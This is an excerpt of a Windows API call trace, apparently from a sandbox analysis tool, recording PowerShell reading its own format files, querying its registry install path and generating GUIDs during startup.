	[0759.893] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.893] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.894] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.894] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.894] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.894] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.894] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.895] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.896] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.896] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.896] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.896] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.897] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.897] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.897] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.899] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.900] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0xbce, lpOverlapped=0x0) returned 1
	[0759.900] ReadFile (in: hFile=0x2f0, lpBuffer=0x31860c6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31860c6*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0759.900] ReadFile (in: hFile=0x2f0, lpBuffer=0x3186990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3186990*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0759.900] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0759.900] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0759.900] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0759.900] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0759.900] CoTaskMemFree (pv=0x1b8e2060) 
	[0759.901] RegCloseKey (hKey=0x2f0) returned 0x0
	[0759.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0759.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf6514872, Data2=0x2a07, Data3=0x4bd8, Data4=([0]=0xaf, [1]=0xc9, [2]=0x8e, [3]=0x98, [4]=0x2a, [5]=0x3d, [6]=0x97, [7]=0x2))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x7ccc0cfc, Data2=0x6138, Data3=0x442c, Data4=([0]=0x9a, [1]=0x82, [2]=0x7a, [3]=0x94, [4]=0xf, [5]=0xcc, [6]=0xdb, [7]=0x0))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xa7c6f4ce, Data2=0x9635, Data3=0x4ecf, Data4=([0]=0xb0, [1]=0x7f, [2]=0x34, [3]=0xc1, [4]=0xb0, [5]=0x8a, [6]=0x68, [7]=0x80))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x1bd74891, Data2=0xdde3, Data3=0x4a80, Data4=([0]=0x8d, [1]=0x65, [2]=0x9, [3]=0xc7, [4]=0x9a, [5]=0xe5, [6]=0x8f, [7]=0x5))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x6cacd255, Data2=0x7a2e, Data3=0x4536, Data4=([0]=0xbb, [1]=0x5e, [2]=0xa1, [3]=0x7, [4]=0x85, [5]=0xf9, [6]=0xa1, [7]=0xd0))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf2276a7f, Data2=0x8eac, Data3=0x4ce0, Data4=([0]=0xac, [1]=0xaf, [2]=0x51, [3]=0x4c, [4]=0x60, [5]=0x0, [6]=0x2a, [7]=0x14))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x340d930c, Data2=0x93a8, Data3=0x4ca1, Data4=([0]=0x80, [1]=0x80, [2]=0x7f, [3]=0x84, [4]=0x2e, [5]=0xe6, [6]=0x6e, [7]=0x61))) returned 0x0
	[0759.902] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x13350240, Data2=0xbafe, Data3=0x4200, Data4=([0]=0x8f, [1]=0x5c, [2]=0xdf, [3]=0xa8, [4]=0x9, [5]=0x14, [6]=0x5d, [7]=0x12))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x9f7413f6, Data2=0x38fa, Data3=0x48f9, Data4=([0]=0x8a, [1]=0xb7, [2]=0x72, [3]=0xdc, [4]=0x5e, [5]=0x7, [6]=0x96, [7]=0x83))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x9e9be430, Data2=0xa46e, Data3=0x47d8, Data4=([0]=0xab, [1]=0x5b, [2]=0x3d, [3]=0x23, [4]=0x3, [5]=0x5f, [6]=0x85, [7]=0x20))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x4a841edb, Data2=0x5f91, Data3=0x4749, Data4=([0]=0xb4, [1]=0x3b, [2]=0x4e, [3]=0xb, [4]=0x7b, [5]=0xba, [6]=0xbb, [7]=0x1e))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x49e7e43c, Data2=0xed52, Data3=0x45dc, Data4=([0]=0x8f, [1]=0x90, [2]=0xf9, [3]=0xfc, [4]=0x73, [5]=0x7a, [6]=0x51, [7]=0xe9))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xd28636d, Data2=0x170, Data3=0x49fc, Data4=([0]=0x92, [1]=0xa2, [2]=0xaf, [3]=0xd0, [4]=0x50, [5]=0x2e, [6]=0xd, [7]=0x43))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xed929803, Data2=0x41f1, Data3=0x4d0e, Data4=([0]=0xa7, [1]=0x89, [2]=0x2f, [3]=0xb3, [4]=0xb8, [5]=0x88, [6]=0xab, [7]=0x6f))) returned 0x0
	[0759.903] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x1e898a72, Data2=0x49a1, Data3=0x480b, Data4=([0]=0x81, [1]=0x6, [2]=0x7c, [3]=0x58, [4]=0xf1, [5]=0xac, [6]=0xc1, [7]=0xc))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x95135347, Data2=0x4136, Data3=0x4297, Data4=([0]=0xa2, [1]=0xf9, [2]=0xc4, [3]=0x61, [4]=0xe0, [5]=0xe, [6]=0xad, [7]=0xb7))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x964fbe3e, Data2=0x64eb, Data3=0x4db4, Data4=([0]=0xa5, [1]=0x9f, [2]=0xfd, [3]=0xcc, [4]=0x6a, [5]=0xa3, [6]=0x79, [7]=0x13))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xada64a30, Data2=0x4cac, Data3=0x4073, Data4=([0]=0x87, [1]=0x38, [2]=0x71, [3]=0x17, [4]=0x9a, [5]=0x2d, [6]=0x85, [7]=0x6d))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xef3112bc, Data2=0xa1d, Data3=0x461d, Data4=([0]=0xb9, [1]=0xfb, [2]=0xc1, [3]=0x57, [4]=0x45, [5]=0xe7, [6]=0x56, [7]=0xf))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc149b307, Data2=0xc13e, Data3=0x464c, Data4=([0]=0x83, [1]=0x67, [2]=0x8a, [3]=0xaa, [4]=0x7c, [5]=0x19, [6]=0x29, [7]=0xa8))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xeba01650, Data2=0x95f5, Data3=0x4157, Data4=([0]=0xb6, [1]=0x76, [2]=0x76, [3]=0xf6, [4]=0xa3, [5]=0xa9, [6]=0x4e, [7]=0xa2))) returned 0x0
	[0759.904] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe3e8eab, Data2=0xb094, Data3=0x497d, Data4=([0]=0xbc, [1]=0x8e, [2]=0xad, [3]=0x53, [4]=0x7e, [5]=0x55, [6]=0x10, [7]=0xc1))) returned 0x0
	[0759.905] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5476de82, Data2=0x16cf, Data3=0x4209, Data4=([0]=0x8c, [1]=0x50, [2]=0x36, [3]=0x7e, [4]=0xe0, [5]=0x1a, [6]=0x8e, [7]=0x2a))) returned 0x0
	[0759.905] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xd872c77, Data2=0x9ce8, Data3=0x4188, Data4=([0]=0xa8, [1]=0xbb, [2]=0x4d, [3]=0x7c, [4]=0x52, [5]=0xd4, [6]=0x7f, [7]=0xe1))) returned 0x0
	[0759.905] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x8a25406e, Data2=0x3d07, Data3=0x4186, Data4=([0]=0xa3, [1]=0x39, [2]=0xb9, [3]=0x93, [4]=0xcd, [5]=0xc0, [6]=0xa, [7]=0x4c))) returned 0x0
	[0759.906] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc97f3f78, Data2=0x24a8, Data3=0x47dc, Data4=([0]=0xa5, [1]=0x91, [2]=0x92, [3]=0xda, [4]=0x65, [5]=0x6c, [6]=0xde, [7]=0x32))) returned 0x0
	[0759.906] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x835f57b, Data2=0x78cb, Data3=0x44c5, Data4=([0]=0xa3, [1]=0x1, [2]=0x58, [3]=0x4a, [4]=0x9e, [5]=0x8a, [6]=0xb7, [7]=0x9e))) returned 0x0
	[0759.906] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x240cd444, Data2=0x6311, Data3=0x4efd, Data4=([0]=0xbf, [1]=0x7c, [2]=0x7e, [3]=0xed, [4]=0x93, [5]=0xa, [6]=0x8d, [7]=0xb9))) returned 0x0
	[0759.907] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe32e3a8, Data2=0x49e, Data3=0x4e9e, Data4=([0]=0xac, [1]=0x21, [2]=0xee, [3]=0xc0, [4]=0xd6, [5]=0x6, [6]=0x5c, [7]=0xa6))) returned 0x0
	[0759.909] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x600356ae, Data2=0x61e3, Data3=0x4996, Data4=([0]=0x81, [1]=0x2b, [2]=0x46, [3]=0xab, [4]=0x27, [5]=0x7e, [6]=0xf, [7]=0x75))) returned 0x0
	[0759.909] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x34fb2bcd, Data2=0xace7, Data3=0x46ab, Data4=([0]=0xbd, [1]=0x41, [2]=0x8f, [3]=0x78, [4]=0x41, [5]=0xbf, [6]=0xab, [7]=0xb))) returned 0x0
	[0759.910] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xaf4bf28a, Data2=0xd29a, Data3=0x4059, Data4=([0]=0xba, [1]=0x2c, [2]=0xa6, [3]=0xe5, [4]=0x9f, [5]=0x22, [6]=0x2f, [7]=0xb1))) returned 0x0
	[0759.910] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x200f0314, Data2=0x1bd1, Data3=0x463b, Data4=([0]=0x92, [1]=0xbb, [2]=0xc0, [3]=0x2d, [4]=0x33, [5]=0x41, [6]=0x88, [7]=0x5a))) returned 0x0
	[0759.910] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x53a4b997, Data2=0x9fe5, Data3=0x49ce, Data4=([0]=0xae, [1]=0xb3, [2]=0xe4, [3]=0x68, [4]=0x2a, [5]=0x53, [6]=0xf7, [7]=0x0))) returned 0x0
	[0759.911] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x123ff146, Data2=0x1007, Data3=0x4a22, Data4=([0]=0xb2, [1]=0xbe, [2]=0xa, [3]=0xd1, [4]=0xbc, [5]=0xd6, [6]=0x35, [7]=0xdc))) returned 0x0
	[0759.911] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5a39d898, Data2=0xbc3d, Data3=0x4388, Data4=([0]=0xa1, [1]=0xc7, [2]=0xa5, [3]=0x33, [4]=0xf1, [5]=0xd7, [6]=0x66, [7]=0x4c))) returned 0x0
	[0759.915] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x641061f1, Data2=0x5c02, Data3=0x489a, Data4=([0]=0xa8, [1]=0x19, [2]=0x12, [3]=0x7, [4]=0xd8, [5]=0xd5, [6]=0xa8, [7]=0x1b))) returned 0x0
	[0759.916] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0759.916] GetFileType (hFile=0x2f0) returned 0x1
	[0759.916] SetErrorMode (uMode=0x1) returned 0x1
	[0759.916] GetFileType (hFile=0x2f0) returned 0x1
	[0759.916] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.918] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.919] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.919] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.920] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x119, lpOverlapped=0x0) returned 1
	[0759.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x3297198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3297198*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0759.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0759.921] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0759.921] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0759.921] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0759.921] CoTaskMemFree (pv=0x1b8e2060) 
	[0759.921] RegCloseKey (hKey=0x2f0) returned 0x0
	[0759.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0759.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0759.927] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x2f0928e4, Data2=0xcd7c, Data3=0x4df4, Data4=([0]=0x9e, [1]=0x2b, [2]=0x5d, [3]=0xb3, [4]=0x9c, [5]=0x8f, [6]=0xb1, [7]=0xec))) returned 0x0
	[0759.928] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe3d983f0, Data2=0x902d, Data3=0x460c, Data4=([0]=0xb0, [1]=0x44, [2]=0xb8, [3]=0xf6, [4]=0xe0, [5]=0x9c, [6]=0x8f, [7]=0xea))) returned 0x0
	[0759.928] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x61e7a599, Data2=0x35c3, Data3=0x461b, Data4=([0]=0x95, [1]=0x7c, [2]=0x38, [3]=0xc1, [4]=0xc1, [5]=0xc5, [6]=0x1d, [7]=0x63))) returned 0x0
	[0759.928] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xbf31ab26, Data2=0x73b2, Data3=0x47b2, Data4=([0]=0xa4, [1]=0x49, [2]=0x31, [3]=0xf1, [4]=0xa9, [5]=0x71, [6]=0xec, [7]=0xeb))) returned 0x0
	[0759.928] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0759.928] GetFileType (hFile=0x2f0) returned 0x1
	[0759.928] SetErrorMode (uMode=0x1) returned 0x1
	[0759.928] GetFileType (hFile=0x2f0) returned 0x1
	[0759.928] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.928] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.929] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.932] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.932] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.932] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
